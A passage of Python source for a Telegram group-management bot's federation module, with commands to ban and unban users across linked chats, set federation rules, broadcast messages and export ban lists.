\"ℹ️ Federation Information:\"\n text += \"\\nFedID: {}\".format(fed_id)\n text += \"\\nName: {}\".format(info[\"fname\"])\n text += \"\\nCreator: {}\".format(mention_html(owner.id, owner_name))\n text += \"\\nAll Admins: {}\".format(TotalAdminFed)\n getfban = sql.get_all_fban_users(fed_id)\n text += \"\\nTotal banned users: {}\".format(len(getfban))\n getfchat = sql.all_fed_chats(fed_id)\n text += \"\\nNumber of groups in this federation: {}\".format(\n len(getfchat))\n\n update.effective_message.reply_text(text, parse_mode=ParseMode.HTML)\n\n\n@run_async\ndef fed_admin(update, context):\n\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n\n if not fed_id:\n update.effective_message.reply_text(\n \"This group is not in any federation!\")\n return\n\n if is_user_fed_admin(fed_id, user.id) is False:\n update.effective_message.reply_text(\n \"Only federation admins can do this!\")\n return\n\n user = update.effective_user # type: Optional[Chat]\n chat = update.effective_chat # type: Optional[Chat]\n info = sql.get_fed_info(fed_id)\n\n text = \"Federation Admin {}:\\n\\n\".format(info[\"fname\"])\n text += \"👑 Owner:\\n\"\n owner = context.bot.get_chat(info[\"owner\"])\n try:\n owner_name = owner.first_name + \" \" + owner.last_name\n except BaseException:\n owner_name = owner.first_name\n text += \" • {}\\n\".format(mention_html(owner.id, owner_name))\n\n members = sql.all_fed_members(fed_id)\n if len(members) == 0:\n text += \"\\n🔱 There is no admin in this federation\"\n else:\n text += \"\\n🔱 Admin:\\n\"\n for x in members:\n user = context.bot.get_chat(x)\n text += \" • {}\\n\".format(mention_html(user.id, user.first_name))\n\n update.effective_message.reply_text(text, parse_mode=ParseMode.HTML)\n\n\n@run_async\ndef fed_ban(update, context):\n\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n\n if not fed_id:\n update.effective_message.reply_text(\n \"This group is not a part of any federation!\")\n return\n\n info = sql.get_fed_info(fed_id)\n getfednotif = sql.user_feds_report(info[\"owner\"])\n\n if is_user_fed_admin(fed_id, user.id) is False:\n update.effective_message.reply_text(\n \"Only federation admins can do this!\")\n return\n\n message = update.effective_message\n\n user_id, reason = extract_unt_fedban(message, args)\n\n fban, fbanreason, fbantime = sql.get_fban_user(fed_id, user_id)\n\n if not user_id:\n message.reply_text(\"You don't seem to be referring to a user\")\n return\n\n if user_id == context.bot.id:\n message.reply_text(\n \"What is funnier than kicking the group creator? Self sacrifice.\")\n return\n\n if is_user_fed_owner(fed_id, user_id) is True:\n message.reply_text(\"Why did you try the federation fban?\")\n return\n\n if is_user_fed_admin(fed_id, user_id) is True:\n message.reply_text(\"He is a federation admin, I can't fban him.\")\n return\n\n if user_id == OWNER_ID:\n message.reply_text(\"That's a very STUPID idea!\")\n return\n\n if int(user_id) in OWNER_ID:\n message.reply_text(\"I will not use sudo fban!\")\n return\n\n try:\n user_chat = context.bot.get_chat(user_id)\n isvalid = True\n fban_user_id = user_chat.id\n fban_user_name = user_chat.first_name\n fban_user_lname = user_chat.last_name\n fban_user_uname = user_chat.username\n except BadRequest as excp:\n if not str(user_id).isdigit():\n send_message(update.effective_message, excp.message)\n return\n if len(str(user_id)) != 9:\n send_message(update.effective_message, \"That's so not a user!\")\n return\n isvalid = False\n fban_user_id = int(user_id)\n fban_user_name = \"user({})\".format(user_id)\n fban_user_lname = None\n fban_user_uname = None\n\n if isvalid and user_chat.type != \"private\":\n send_message(update.effective_message, \"That's so not a user!\")\n return\n\n if isvalid:\n user_target = mention_html(fban_user_id, fban_user_name)\n else:\n user_target = fban_user_name\n\n if fban:\n fed_name = info[\"fname\"]\n if reason == \"\":\n reason = \"No reason given.\"\n\n temp = sql.un_fban_user(fed_id, fban_user_id)\n if not temp:\n message.reply_text(\"Failed to update the reason for fedban!\")\n return\n x = sql.fban_user(\n fed_id,\n fban_user_id,\n fban_user_name,\n fban_user_lname,\n fban_user_uname,\n reason,\n int(time.time()),\n )\n if not x:\n message.reply_text(\"Failed to ban from the federation!\")\n return\n\n fed_chats = sql.all_fed_chats(fed_id)\n # Will send to current chat\n context.bot.send_message(\n chat.id,\n \"New FederationBan\"\n \"\\nFederation: {}\"\n \"\\nFederation Admin: {}\"\n \"\\nUser: {}\"\n \"\\nUser ID: {}\"\n \"\\nReason: {}\".format(\n fed_name,\n mention_html(user.id, user.first_name),\n user_target,\n fban_user_id,\n reason,\n ),\n parse_mode=\"HTML\",\n )\n # Send message to owner if fednotif is enabled\n if getfednotif:\n context.bot.send_message(\n info[\"owner\"],\n \"FedBan reason updated\"\n \"\\nFederation: {}\"\n \"\\nFederation Admin: {}\"\n \"\\nUser: {}\"\n \"\\nUser ID: {}\"\n \"\\nReason: {}\".format(\n fed_name,\n mention_html(user.id, user.first_name),\n user_target,\n fban_user_id,\n reason,\n ),\n parse_mode=\"HTML\",\n )\n # If fedlog is set, then send message, except fedlog is current chat\n get_fedlog = sql.get_fed_log(fed_id)\n if get_fedlog:\n if int(get_fedlog) != int(chat.id):\n context.bot.send_message(\n get_fedlog,\n \"FedBan reason updated\"\n \"\\nFederation: {}\"\n \"\\nFederation Admin: {}\"\n \"\\nUser: {}\"\n \"\\nUser ID: {}\"\n \"\\nReason: {}\".format(\n fed_name,\n mention_html(user.id, user.first_name),\n user_target,\n fban_user_id,\n reason,\n ),\n parse_mode=\"HTML\",\n )\n for fedschat in fed_chats:\n try:\n # Do not spam all fed chats\n \"\"\"\n context.bot.send_message(chat, \"FedBan reason updated\" \\\n \"\\nFederation: {}\" \\\n \"\\nFederation Admin: {}\" \\\n \"\\nUser: {}\" \\\n \"\\nUser ID: {}\" \\\n \"\\nReason: {}\".format(fed_name, mention_html(user.id, user.first_name), user_target, fban_user_id, reason), parse_mode=\"HTML\")\n \"\"\"\n context.bot.kick_chat_member(fedschat, fban_user_id)\n except BadRequest as excp:\n if excp.message in FBAN_ERRORS:\n try:\n dispatcher.bot.getChat(fedschat)\n except Unauthorized:\n sql.chat_leave_fed(fedschat)\n LOGGER.info(\n \"Chat {} has leave fed {} because I was kicked\".\n format(fedschat, info[\"fname\"]))\n continue\n elif excp.message == \"User_id_invalid\":\n break\n else:\n LOGGER.warning(\"Could not fban on {} because: {}\".format(\n chat, excp.message))\n except TelegramError:\n pass\n # Also do not spam all fed admins\n\n # send_to_list(bot, FEDADMIN,\n # \"FedBan reason updated\" \\\n # \"\\nFederation: {}\" \\\n # \"\\nFederation Admin: {}\" \\\n # \"\\nUser: {}\" \\\n # \"\\nUser ID: {}\" \\\n # \"\\nReason: {}\".format(fed_name, mention_html(user.id, user.first_name), user_target, fban_user_id, reason),\n # html=True)\n\n # Fban for fed subscriber\n subscriber = list(sql.get_subscriber(fed_id))\n if len(subscriber) != 0:\n for fedsid in subscriber:\n all_fedschat = sql.all_fed_chats(fedsid)\n for fedschat in all_fedschat:\n try:\n context.bot.kick_chat_member(fedschat, fban_user_id)\n except BadRequest as excp:\n if excp.message in FBAN_ERRORS:\n try:\n dispatcher.bot.getChat(fedschat)\n except Unauthorized:\n targetfed_id = sql.get_fed_id(fedschat)\n sql.unsubs_fed(fed_id, targetfed_id)\n LOGGER.info(\n \"Chat {} has unsub fed {} because I was kicked\" .format(\n fedschat, info[\"fname\"]))\n continue\n elif excp.message == \"User_id_invalid\":\n break\n else:\n LOGGER.warning(\n \"Unable to fban on {} because: {}\".format(\n fedschat, excp.message))\n except TelegramError:\n pass\n # send_message(update.effective_message, \"Fedban Reason has been updated.\")\n return\n\n fed_name = info[\"fname\"]\n\n starting = \"Starting a federation ban for {} in the Federation {}.\".format(\n user_target, fed_name)\n update.effective_message.reply_text(starting, parse_mode=ParseMode.HTML)\n\n if reason == \"\":\n reason = \"No reason given.\"\n\n x = sql.fban_user(\n fed_id,\n fban_user_id,\n fban_user_name,\n fban_user_lname,\n fban_user_uname,\n reason,\n int(time.time()),\n )\n if not x:\n message.reply_text(\"Failed to ban from the federation!\")\n return\n\n fed_chats = sql.all_fed_chats(fed_id)\n # Will send to current chat\n context.bot.send_message(\n chat.id,\n \"FedBan reason updated\"\n \"\\nFederation: {}\"\n \"\\nFederation Admin: {}\"\n \"\\nUser: {}\"\n \"\\nUser ID: {}\"\n \"\\nReason: {}\".format(\n fed_name,\n mention_html(user.id, user.first_name),\n user_target,\n fban_user_id,\n reason,\n ),\n parse_mode=\"HTML\",\n )\n # Send message to owner if fednotif is enabled\n if getfednotif:\n context.bot.send_message(\n info[\"owner\"],\n \"FedBan reason updated\"\n \"\\nFederation: {}\"\n \"\\nFederation Admin: {}\"\n \"\\nUser: {}\"\n \"\\nUser ID: {}\"\n \"\\nReason: {}\".format(\n fed_name,\n mention_html(user.id, user.first_name),\n user_target,\n fban_user_id,\n reason,\n ),\n parse_mode=\"HTML\",\n )\n # If fedlog is set, then send message, except fedlog is current chat\n get_fedlog = sql.get_fed_log(fed_id)\n if get_fedlog:\n if int(get_fedlog) != int(chat.id):\n context.bot.send_message(\n get_fedlog,\n \"FedBan reason updated\"\n \"\\nFederation: {}\"\n \"\\nFederation Admin: {}\"\n \"\\nUser: {}\"\n \"\\nUser ID: {}\"\n \"\\nReason: {}\".format(\n fed_name,\n mention_html(user.id, user.first_name),\n user_target,\n fban_user_id,\n reason,\n ),\n parse_mode=\"HTML\",\n )\n chats_in_fed = 0\n for fedschat in fed_chats:\n chats_in_fed += 1\n try:\n # Do not spamming all fed chats\n \"\"\"\n context.bot.send_message(chat, \"FedBan reason updated\" \\\n \"\\nFederation: {}\" \\\n \"\\nFederation Admin: {}\" \\\n \"\\nUser: {}\" \\\n \"\\nUser ID: {}\" \\\n \"\\nReason: {}\".format(fed_name, mention_html(user.id, user.first_name), user_target, fban_user_id, reason), parse_mode=\"HTML\")\n \"\"\"\n context.bot.kick_chat_member(fedschat, fban_user_id)\n except BadRequest as excp:\n if excp.message in FBAN_ERRORS:\n pass\n elif excp.message == \"User_id_invalid\":\n break\n else:\n LOGGER.warning(\"Could not fban on {} because: {}\".format(\n chat, excp.message))\n except TelegramError:\n pass\n\n # Also do not spamming all fed admins\n \"\"\"\n\t\tsend_to_list(bot, FEDADMIN,\n\t\t\t\t \"FedBan reason updated\" \\\n\t\t\t\t\t\t\t \"\\nFederation: {}\" \\\n\t\t\t\t\t\t\t \"\\nFederation Admin: {}\" \\\n\t\t\t\t\t\t\t \"\\nUser: {}\" \\\n\t\t\t\t\t\t\t \"\\nUser ID: {}\" \\\n\t\t\t\t\t\t\t \"\\nReason: {}\".format(fed_name, mention_html(user.id, user.first_name), user_target, fban_user_id, reason),\n\t\t\t\t\t\t\thtml=True)\n\t\t\"\"\"\n\n # Fban for fed subscriber\n subscriber = list(sql.get_subscriber(fed_id))\n if len(subscriber) != 0:\n for fedsid in subscriber:\n all_fedschat = sql.all_fed_chats(fedsid)\n for fedschat in all_fedschat:\n try:\n context.bot.kick_chat_member(fedschat, fban_user_id)\n except BadRequest as excp:\n if excp.message in FBAN_ERRORS:\n try:\n dispatcher.bot.getChat(fedschat)\n except Unauthorized:\n targetfed_id = sql.get_fed_id(fedschat)\n sql.unsubs_fed(fed_id, targetfed_id)\n LOGGER.info(\n \"Chat {} has unsub fed {} because I was kicked\" .format(\n fedschat, info[\"fname\"]))\n continue\n elif excp.message == \"User_id_invalid\":\n break\n else:\n LOGGER.warning(\n \"Unable to fban on {} because: {}\".format(\n fedschat, excp.message))\n except TelegramError:\n pass\n if chats_in_fed == 0:\n send_message(update.effective_message, \"Fedban affected 0 chats. \")\n elif chats_in_fed > 0:\n send_message(update.effective_message,\n \"Fedban affected {} chats. \".format(chats_in_fed))\n\n\n@run_async\ndef unfban(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n message = update.effective_message # type: Optional[Message]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n\n if not fed_id:\n update.effective_message.reply_text(\n \"This group is not a part of any federation!\")\n return\n\n info = sql.get_fed_info(fed_id)\n getfednotif = sql.user_feds_report(info[\"owner\"])\n\n if is_user_fed_admin(fed_id, user.id) is False:\n update.effective_message.reply_text(\n \"Only federation admins can do this!\")\n return\n\n user_id = extract_user_fban(message, args)\n if not user_id:\n message.reply_text(\"You do not seem to be referring to a user.\")\n return\n\n try:\n user_chat = context.bot.get_chat(user_id)\n isvalid = True\n fban_user_id = user_chat.id\n fban_user_name = user_chat.first_name\n fban_user_lname = user_chat.last_name\n fban_user_uname = user_chat.username\n except BadRequest as excp:\n if not str(user_id).isdigit():\n send_message(update.effective_message, excp.message)\n return\n if len(str(user_id)) != 9:\n send_message(update.effective_message, \"That's so not a user!\")\n return\n isvalid = False\n fban_user_id = int(user_id)\n fban_user_name = \"user({})\".format(user_id)\n fban_user_lname = None\n fban_user_uname = None\n\n if isvalid and user_chat.type != \"private\":\n message.reply_text(\"That's so not a user!\")\n return\n\n if isvalid:\n user_target = mention_html(fban_user_id, fban_user_name)\n else:\n user_target = fban_user_name\n\n fban, fbanreason, fbantime = sql.get_fban_user(fed_id, fban_user_id)\n if fban is False:\n message.reply_text(\"This user is not fbanned!\")\n return\n\n message.reply_text(\"I'll give {} another chance in this federation\".format(\n user_chat.first_name))\n\n chat_list = sql.all_fed_chats(fed_id)\n # Will send to current chat\n context.bot.send_message(\n chat.id,\n \"Un-FedBan\"\n \"\\nFederation: {}\"\n \"\\nFederation Admin: {}\"\n \"\\nUser: {}\"\n \"\\nUser ID: {}\".format(\n info[\"fname\"],\n mention_html(user.id, user.first_name),\n user_target,\n fban_user_id,\n ),\n parse_mode=\"HTML\",\n )\n # Send message to owner if fednotif is enabled\n if getfednotif:\n context.bot.send_message(\n info[\"owner\"],\n \"Un-FedBan\"\n \"\\nFederation: {}\"\n \"\\nFederation Admin: {}\"\n \"\\nUser: {}\"\n \"\\nUser ID: {}\".format(\n info[\"fname\"],\n mention_html(user.id, user.first_name),\n user_target,\n fban_user_id,\n ),\n parse_mode=\"HTML\",\n )\n # If fedlog is set, then send message, except fedlog is current chat\n get_fedlog = sql.get_fed_log(fed_id)\n if get_fedlog:\n if int(get_fedlog) != int(chat.id):\n context.bot.send_message(\n get_fedlog,\n \"Un-FedBan\"\n \"\\nFederation: {}\"\n \"\\nFederation Admin: {}\"\n \"\\nUser: {}\"\n \"\\nUser ID: {}\".format(\n info[\"fname\"],\n mention_html(user.id, user.first_name),\n user_target,\n fban_user_id,\n ),\n parse_mode=\"HTML\",\n )\n unfbanned_in_chats = 0\n for fedchats in chat_list:\n unfbanned_in_chats += 1\n try:\n member = context.bot.get_chat_member(fedchats, user_id)\n if member.status == \"kicked\":\n context.bot.unban_chat_member(fedchats, user_id)\n # Do not spamming all fed chats\n \"\"\"\n\t\t\tcontext.bot.send_message(chat, \"Un-FedBan\" \\\n\t\t\t\t\t\t \"\\nFederation: {}\" \\\n\t\t\t\t\t\t \"\\nFederation Admin: {}\" \\\n\t\t\t\t\t\t \"\\nUser: {}\" \\\n\t\t\t\t\t\t \"\\nUser ID: {}\".format(info['fname'], mention_html(user.id, user.first_name), user_target, fban_user_id), parse_mode=\"HTML\")\n\t\t\t\"\"\"\n except BadRequest as excp:\n if excp.message in UNFBAN_ERRORS:\n pass\n elif excp.message == \"User_id_invalid\":\n break\n else:\n LOGGER.warning(\"Could not fban on {} because: {}\".format(\n chat, excp.message))\n except TelegramError:\n pass\n\n try:\n x = sql.un_fban_user(fed_id, user_id)\n if not x:\n send_message(\n update.effective_message,\n \"Un-fban failed, this user may already be un-fedbanned!\",\n )\n return\n except Exception:\n pass\n\n # UnFban for fed subscriber\n subscriber = list(sql.get_subscriber(fed_id))\n if len(subscriber) != 0:\n for fedsid in subscriber:\n all_fedschat = sql.all_fed_chats(fedsid)\n for fedschat in all_fedschat:\n try:\n context.bot.unban_chat_member(fedchats, user_id)\n except BadRequest as excp:\n if excp.message in FBAN_ERRORS:\n try:\n dispatcher.bot.getChat(fedschat)\n except Unauthorized:\n targetfed_id = sql.get_fed_id(fedschat)\n sql.unsubs_fed(fed_id, targetfed_id)\n LOGGER.info(\n \"Chat {} has unsub fed {} because I was kicked\"\n .format(fedschat, info[\"fname\"]))\n continue\n elif excp.message == \"User_id_invalid\":\n break\n else:\n LOGGER.warning(\n \"Unable to fban on {} because: {}\".format(\n fedschat, excp.message))\n except TelegramError:\n pass\n\n if unfbanned_in_chats == 0:\n send_message(update.effective_message,\n \"This person has been un-fbanned in 0 chats.\")\n if unfbanned_in_chats > 0:\n send_message(\n update.effective_message,\n \"This person has been un-fbanned in {} chats.\".format(\n unfbanned_in_chats),\n )\n # Also do not spamming all fed admins\n \"\"\"\n\tFEDADMIN = sql.all_fed_users(fed_id)\n\tfor x in FEDADMIN:\n\t\tgetreport = sql.user_feds_report(x)\n\t\tif getreport == False:\n\t\t\tFEDADMIN.remove(x)\n\tsend_to_list(bot, FEDADMIN,\n\t\t\t \"Un-FedBan\" \\\n\t\t\t \"\\nFederation: {}\" \\\n\t\t\t \"\\nFederation Admin: {}\" \\\n\t\t\t \"\\nUser: {}\" \\\n\t\t\t \"\\nUser ID: {}\".format(info['fname'], mention_html(user.id, user.first_name),\n\t\t\t\t\t\t\t\t\t\t\t\t mention_html(user_chat.id, user_chat.first_name),\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t user_chat.id),\n\t\t\thtml=True)\n\t\"\"\"\n\n\n@run_async\ndef set_frules(update, context):\n\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n\n if not fed_id:\n update.effective_message.reply_text(\n \"This chat is not in any federation!\")\n return\n\n if is_user_fed_admin(fed_id, user.id) is False:\n update.effective_message.reply_text(\"Only fed admins can do this!\")\n return\n\n if len(args) >= 1:\n msg = update.effective_message # type: Optional[Message]\n raw_text = msg.text\n # use python's maxsplit to separate cmd and args\n args = raw_text.split(None, 1)\n if len(args) == 2:\n txt = args[1]\n # set correct offset relative to command\n offset = len(txt) - len(raw_text)\n markdown_rules = markdown_parser(txt,\n entities=msg.parse_entities(),\n offset=offset)\n x = sql.set_frules(fed_id, markdown_rules)\n if not x:\n update.effective_message.reply_text(\n \"Big F! There is an error while setting federation rules!\")\n return\n\n rules = sql.get_fed_info(fed_id)[\"frules\"]\n getfed = sql.get_fed_info(fed_id)\n get_fedlog = sql.get_fed_log(fed_id)\n if get_fedlog:\n if eval(get_fedlog):\n context.bot.send_message(\n get_fedlog,\n \"*{}* has changed federation rules for fed *{}*\".format(\n user.first_name, getfed[\"fname\"]),\n parse_mode=\"markdown\",\n )\n update.effective_message.reply_text(\n f\"Rules have been changed to :\\n{rules}!\")\n else:\n update.effective_message.reply_text(\"Please write rules to set it up!\")\n\n\n@run_async\ndef get_frules(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n if not fed_id:\n update.effective_message.reply_text(\n \"This chat is not in any federation!\")\n return\n\n rules = sql.get_frules(fed_id)\n text = \"*Rules in this fed:*\\n\"\n text += rules\n update.effective_message.reply_text(text, parse_mode=ParseMode.MARKDOWN)\n\n\n@run_async\ndef fed_broadcast(update, context):\n msg = update.effective_message # type: Optional[Message]\n user = update.effective_user # type: Optional[User]\n chat = update.effective_chat # type: Optional[Chat]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n if args:\n chat = update.effective_chat # type: Optional[Chat]\n fed_id = sql.get_fed_id(chat.id)\n fedinfo = sql.get_fed_info(fed_id)\n # Parsing md\n raw_text = msg.text\n # use python's maxsplit to separate cmd and args\n args = raw_text.split(None, 1)\n txt = args[1]\n # set correct offset relative to command\n offset = len(txt) - len(raw_text)\n text_parser = markdown_parser(txt,\n entities=msg.parse_entities(),\n offset=offset)\n text = text_parser\n try:\n broadcaster = user.first_name\n except BaseException:\n broadcaster = user.first_name + \" \" + user.last_name\n text += \"\\n\\n- {}\".format(mention_markdown(user.id, broadcaster))\n chat_list = sql.all_fed_chats(fed_id)\n failed = 0\n for chat in chat_list:\n title = \"*New broadcast from Fed {}*\\n\".format(fedinfo[\"fname\"])\n try:\n context.bot.sendMessage(chat,\n title + text,\n parse_mode=\"markdown\")\n except TelegramError:\n try:\n dispatcher.bot.getChat(chat)\n except Unauthorized:\n failed += 1\n sql.chat_leave_fed(chat)\n LOGGER.info(\n \"Chat {} has leave fed {} because I was kicked\".format(\n chat, fedinfo[\"fname\"]))\n continue\n failed += 1\n LOGGER.warning(\"Couldn't send broadcast to {}\".format(\n str(chat)))\n\n send_text = \"The federation broadcast is complete\"\n if failed >= 1:\n send_text += \"{} the group failed to receive the message, probably because it left the Federation.\".format(\n failed)\n update.effective_message.reply_text(send_text)\n\n\n@run_async\n@send_action(ChatAction.UPLOAD_DOCUMENT)\ndef fed_ban_list(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n args = context.args\n chat_data = context.chat_data\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n info = sql.get_fed_info(fed_id)\n\n if not fed_id:\n update.effective_message.reply_text(\n \"This group is not a part of any federation!\")\n return\n\n if is_user_fed_owner(fed_id, user.id) is False:\n update.effective_message.reply_text(\n \"Only Federation owners can do this!\")\n return\n\n user = update.effective_user # type: Optional[Chat]\n chat = update.effective_chat # type: Optional[Chat]\n getfban = sql.get_all_fban_users(fed_id)\n if len(getfban) == 0:\n update.effective_message.reply_text(\n \"The federation ban list of {} is empty\".format(info[\"fname\"]),\n parse_mode=ParseMode.HTML,\n )\n return\n\n if args:\n if args[0] == \"json\":\n jam = time.time()\n new_jam = jam + 1800\n cek = get_chat(chat.id, chat_data)\n if cek.get(\"status\"):\n if jam <= int(cek.get(\"value\")):\n waktu = time.strftime(\"%H:%M:%S %d/%m/%Y\",\n time.localtime(cek.get(\"value\")))\n update.effective_message.reply_text(\n \"You can backup your data once every 30 minutes!\\nYou can back up data again at `{}`\" .format(waktu),\n parse_mode=ParseMode.MARKDOWN,\n )\n return\n if str(user.id) not in str(OWNER_ID):\n put_chat(chat.id, new_jam, chat_data)\n else:\n if str(user.id) not in str(OWNER_ID):\n put_chat(chat.id, new_jam, chat_data)\n backups = \"\"\n for users in getfban:\n getuserinfo = sql.get_all_fban_users_target(fed_id, users)\n json_parser = {\n \"user_id\": users,\n \"first_name\": getuserinfo[\"first_name\"],\n \"last_name\": getuserinfo[\"last_name\"],\n \"user_name\": getuserinfo[\"user_name\"],\n \"reason\": getuserinfo[\"reason\"],\n }\n backups += json.dumps(json_parser)\n backups += \"\\n\"\n with BytesIO(str.encode(backups)) as output:\n output.name = \"julia_fbanned_users.json\"\n update.effective_message.reply_document(\n document=output,\n filename=\"julia_fbanned_users.json\",\n caption=\"Total {} User are blocked by the Federation {}.\".\n format(len(getfban), info[\"fname\"]),\n )\n return\n if args[0] == \"csv\":\n jam = time.time()\n new_jam = jam + 1800\n cek = get_chat(chat.id, chat_data)\n if cek.get(\"status\"):\n if jam <= int(cek.get(\"value\")):\n waktu = time.strftime(\"%H:%M:%S %d/%m/%Y\",\n time.localtime(cek.get(\"value\")))\n update.effective_message.reply_text(\n \"You can back up data once every 30 minutes!\\nYou can back up data again at `{}`\" .format(waktu),\n parse_mode=ParseMode.MARKDOWN,\n )\n return\n if str(user.id) not in str(OWNER_ID):\n put_chat(chat.id, new_jam, chat_data)\n else:\n if str(user.id) not in str(OWNER_ID):\n put_chat(chat.id, new_jam, chat_data)\n backups = \"id,firstname,lastname,username,reason\\n\"\n for users in getfban:\n getuserinfo = sql.get_all_fban_users_target(fed_id, users)\n backups += (\n \"{user_id},{first_name},{last_name},{user_name},{reason}\".\n format(\n user_id=users,\n first_name=getuserinfo[\"first_name\"],\n last_name=getuserinfo[\"last_name\"],\n user_name=getuserinfo[\"user_name\"],\n reason=getuserinfo[\"reason\"],\n ))\n backups += \"\\n\"\n with BytesIO(str.encode(backups)) as output:\n output.name = \"julia_fbanned_users.csv\"\n update.effective_message.reply_document(\n document=output,\n filename=\"julia_fbanned_users.csv\",\n caption=\"Total {} User are blocked by Federation {}.\".\n format(len(getfban), info[\"fname\"]),\n )\n return\n\n text = \"{} users have been banned from the federation {}:\\n\".format(\n len(getfban), info[\"fname\"])\n for users in getfban:\n getuserinfo = sql.get_all_fban_users_target(fed_id, users)\n if getuserinfo is False:\n text = \"There are no users banned from the federation {}\".format(\n info[\"fname\"])\n break\n user_name = getuserinfo[\"first_name\"]\n if getuserinfo[\"last_name\"]:\n user_name += \" \" + getuserinfo[\"last_name\"]\n text += \" • {} ({})\\n\".format(\n mention_html(users, user_name), users)\n\n try:\n update.effective_message.reply_text(text, parse_mode=ParseMode.HTML)\n except BaseException:\n jam = time.time()\n new_jam = jam + 1800\n cek = get_chat(chat.id, chat_data)\n if cek.get(\"status\"):\n if jam <= int(cek.get(\"value\")):\n waktu = time.strftime(\"%H:%M:%S %d/%m/%Y\",\n time.localtime(cek.get(\"value\")))\n update.effective_message.reply_text(\n \"You can back up data once every 30 minutes!\\nYou can back up data again at `{}`\" .format(waktu),\n parse_mode=ParseMode.MARKDOWN,\n )\n return\n if str(user.id) not in str(OWNER_ID):\n put_chat(chat.id, new_jam, chat_data)\n else:\n if str(user.id) not in str(OWNER_ID):\n put_chat(chat.id, new_jam, chat_data)\n cleanr = re.compile(\"<.*?>\")\n cleantext = re.sub(cleanr, \"\", text)\n with BytesIO(str.encode(cleantext)) as output:\n output.name = \"fbanlist.txt\"\n update.effective_message.reply_document(\n document=output,\n filename=\"fbanlist.txt\",\n caption=\"The following is a list of users who are currently fbanned in the Federation {}.\" .format(\n info[\"fname\"]),\n )\n\n\n@run_async\ndef fed_notif(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n msg = update.effective_message # type: Optional[Message]\n args = context.args\n fed_id = sql.get_fed_id(chat.id)\n\n if not fed_id:\n update.effective_message.reply_text(\n \"This group is not a part of any federation!\")\n return\n\n if args:\n if args[0] in (\"yes\", \"on\"):\n sql.set_feds_setting(user.id, True)\n msg.reply_text(\n \"Reporting Federation back up! Every user who is fban / unfban you will be notified via PM.\"\n )\n elif args[0] in (\"no\", \"off\"):\n sql.set_feds_setting(user.id, False)\n msg.reply_text(\n \"Reporting Federation has stopped! Every user who is fban / unfban you will not be notified via PM.\"\n )\n else:\n msg.reply_text(\"Please enter `on`/`off`\", parse_mode=\"markdown\")\n else:\n getreport = sql.user_feds_report(user.id)\n msg.reply_text(\n \"Your current Federation report preferences: `{}`\".format(\n getreport),\n parse_mode=\"markdown\",\n )\n\n\n@run_async\ndef fed_chats(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n args = context.args\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n info = sql.get_fed_info(fed_id)\n\n if not fed_id:\n update.effective_message.reply_text(\n \"This group is not a part of any federation!\")\n return\n\n if is_user_fed_admin(fed_id, user.id) is False:\n update.effective_message.reply_text(\n \"Only federation admins can do this!\")\n return\n\n getlist = sql.all_fed_chats(fed_id)\n if len(getlist) == 0:\n update.effective_message.reply_text(\n \"No users are fbanned from the federation {}\".format(\n info[\"fname\"]),\n parse_mode=ParseMode.HTML,\n )\n return\n\n text = \"New chat joined the federation {}:\\n\".format(info[\"fname\"])\n for chats in getlist:\n try:\n chat_name = dispatcher.bot.getChat(chats).title\n except Unauthorized:\n sql.chat_leave_fed(chats)\n LOGGER.info(\"Chat {} has leave fed {} because I was kicked\".format(\n chats, info[\"fname\"]))\n continue\n text += \" • {} ({})\\n\".format(chat_name, chats)\n\n try:\n update.effective_message.reply_text(text, parse_mode=ParseMode.HTML)\n except BaseException:\n cleanr = re.compile(\"<.*?>\")\n cleantext = re.sub(cleanr, \"\", text)\n with BytesIO(str.encode(cleantext)) as output:\n output.name = \"fedchats.txt\"\n update.effective_message.reply_document(\n document=output,\n filename=\"fedchats.txt\",\n caption=\"Here is a list of all the chats that joined the federation {}.\" .format(\n info[\"fname\"]),\n )\n\n\n@run_async\ndef fed_import_bans(update, context):\n chat = update.effective_chat # type: Optional[Chat]\n user = update.effective_user # type: Optional[User]\n msg = update.effective_message # type: Optional[Message]\n chat_data = context.chat_data\n\n if chat.type == \"private\":\n send_message(\n update.effective_message,\n \"This command is specific to the group, not to the PM! \",\n )\n return\n\n fed_id = sql.get_fed_id(chat.id)\n # info = sql.get_fed_info(fed_id)\n getfed = sql.get_fed_info(fed_id)\n\n if not fed_id:\n update.effective_message.reply_text(\n \"This group is not a part of any federation!\")\n return\n\n if is_user_fed_owner(fed_id, user.id) is False:\n update.effective_message.reply_text(\n \"Only Federation owners can do this!\")\n return\n\n if msg.reply_to_message and msg.reply_to_message.document:\n jam = time.time()\n new_jam = jam + 1800\n cek = get_chat(chat.id, chat_data)\n if cek.get(\"status\"):\n if jam <= 